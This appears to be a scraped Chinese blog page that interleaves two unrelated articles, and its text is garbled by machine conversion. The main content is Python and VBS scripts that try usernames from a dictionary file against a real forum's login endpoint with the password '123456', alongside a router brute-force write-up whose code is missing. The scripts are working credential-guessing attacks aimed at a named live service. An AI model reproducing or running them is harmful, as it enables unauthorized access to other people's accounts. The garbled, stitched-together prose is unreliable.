Python牛刀小规模试制密码爆破

发布时间:2019-04-01  栏目:Python  评论:0 Comments

图片 1

莫不是真的要本身破解一个么?算了,正好试试笔者的Python水平。
python版

image

复制代码 代码如下:

在庭院里面看到了一个没人用的路由器(ws860s),看起来像个黑科学和技术的玩意儿,就想着进去看看,到底有哪些好玩的。看到后边的标签上有web界面包车型地铁地址,然后登陆进去看看,发现有密码,然后本身想,路由器的密码应该都以足以reset的,然后作者就用笔戳那多少个reset键,神蹟没有发出,原来这一个reset键坏了。

#coding: gbk
import httplib, urllib

图片 2

def Check(username, password):
params = urllib.urlencode(
{‘userid’: username, ‘passwd’: password})
headers = {“Content-type”:
“application/x-www-form-urlencoded”}
conn = httplib.HTTPSConnection(“www.bdwm.net”)
conn.request(“POST”,
“/bbs/bbslog2.php”, params, headers)
res = conn.getresponse().read()
conn.close()
if res.find(“密码不科学”) != -1:
return False
elif res.find(“不存在那个用户”) != -1:
return False
else:
return True

image

for i in open(“English.Dic”):
if Check(i.rstrip(),”123456″):
print i

图片 3

顺手也写了个VBS版的,感觉相似VBS相比快,感觉出标题了?

image

复制代码 代码如下:

分析进度

Dim fso
Set fso = CreateObject(“scripting.filesystemobject”)
With fso.OpenTextFile(“English.Dic”,1)
Do Until .AtEndOfStream
id = .ReadLine
If Check(id,”123456″) Then
WScript.Echo id & vbTab &”OK”
End If
Loop
End With

抓包

Function Check(username,password)
Dim http
Set http = CreateObject(“Msxml2.XMLHTTP”)
http.open _
“POST”,”https://www.bdwm.net/bbs/bbslog2.php",False
http.setRequestHeader _
“Content-Type”,”application/x-www-form-urlencoded”
http.send “userid=” & username & “&passwd=” & password
response = AnsiToUnicode(http.responseBody)
If InStr(response,”密码不科学”) Then
Check = False
ElseIf InStr(response,”不存在那几个用户”) Then
Check = False
Else
Check = True
End If
End Function

一 、打开路由的web页面:192.168.3.1,路由器重回

Function AnsiToUnicode(str)
Dim ado
Set ado = CreateObject(“adodb.stream”)
ado.Type = 1
ado.Open
ado.Write str
ado.Position = 0
ado.Type = 2
ado.Charset = “gb2312”
AnsiToUnicode = ado.ReadText
End Function

图片 4

事实注明,123456真是一个强有力的密码。但愿早晨尚未警察岳丈敲门。
原文:http://demon.tw/programming/python-a-little-trial.html

image

http://www.bkjia.com/Pythonjc/306570.htmlwww.bkjia.comtruehttp://www.bkjia.com/Pythonjc/306570.htmlTechArticle难道真的要我破解一个么?算了,正好试试我的Python水平。
python版 复制代码 代码如下: #coding: gbk import httplib, urllib def
Check(username, password)…

图片 5

image

会赢得csrf和cookie和所需求的值,这一个值都要保留下来,后边会用。

二 、输入用户名密码后:

图片 6

image

图片 7

image

图片 8

image

图片 9

image

三 、路由器重返数据

图片 10

image

密码的浮动方法

从上边抓包的结果来看,Password字段是因而加密的,所以如若大家要Python暴力破解,须要把那么些password的生成算法找出来。

开拓web登录页面,查看源代码,找找算法

图片 11

image

图片 12

image

图片 13

image

图片 14

image

图片 15

image

在linux上改动ip地址,非常的粗略一条命令就足以缓解:

图片 16

image

[password:bbbbbbbb];{“errorCategory”:”user_pass_err”,”csrf_param”:”FcnG919l8J7XhQsOYQEMS3WhsC2liSX”,”count”:2,”csrf_token”:”IQ/LfSZSx7gTp6VflYnZelobNSpoMy2″}

ip地址被限定,需求静观其变1分钟的提醒:

[password:aaaaaaaa];{“errorCategory”:”Three_time_err”,”csrf_param”:”VKGTylVILQA9SFsTyYdpkHv8qfJPIIw”,”count”:3,”csrf_token”:”MTQLBcWQN+1DJjAP+A6xC4AUSXciBod”}

报到成功的唤起:

****[password:xxxxxxxx];{“csrf_param”:”H/DyWxogz7+2y4UfzhqddowkjH1uL04″,”csrf_token”:”MorgBb0+PNpoE8KhwBwq4OoioD2NcCs”,”errorCategory”:”ok”,”level”:2,”IsWizard”:true,”IsFirst”:true}

流程

图片 17

image

装有的多少都准备好了,下一步,正是发端利用Python写程序了。

核心Python代码:

图片 18

image

图片 19

image

图片 20

image

图片 21

image

图片 22

image

图片 23

image

图片 24

image

图片 25

image

图片 26

image

图片 27

image

图片 28

image

图片 29

image

图片 30

image

图片 31

image

图片 32

image

怎么防范暴力破解?

图片 33

image

图片 34

留下评论

网站地图xml地图